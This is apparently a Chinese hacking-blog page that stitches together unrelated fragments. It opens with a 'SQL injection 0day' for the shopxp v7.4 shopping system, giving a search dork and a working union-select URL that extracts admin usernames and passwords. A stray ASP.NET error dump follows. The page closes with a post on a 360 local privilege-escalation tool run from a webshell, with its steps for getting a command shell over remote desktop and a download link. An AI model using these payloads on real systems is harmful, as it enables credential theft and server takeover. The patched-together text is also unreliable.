shopxp v7.4 SQL注入0day


 


漏洞版本:shopxp网上购物系统 v7.4
关键词:inurl:shopxp_news.asp
shopxp_news.asp
暴密码的语句:
/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin

...

Server Error in '/' Application.Bad IL format

Server Error in '/' Application.

Bad IL format.

Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
...

360本地提权webshell下测试程序

测试方法: 在webshell下运行360test.exe 成功后,3389到服务器,按5下shift,得到一个cmd [IMG]upload/2010/3/201003071749458465.jpg[/IMG] PS:由于需要本地权限,对个人用户不会造成影响,危害也不是大范围的。 [URL=upload/2010/3/201003071751447446.rar]201003071751447446.rar[/URL]
«1»
控制面板
网站分类
搜索
文章归档
友情链接
最近发表
Tags列表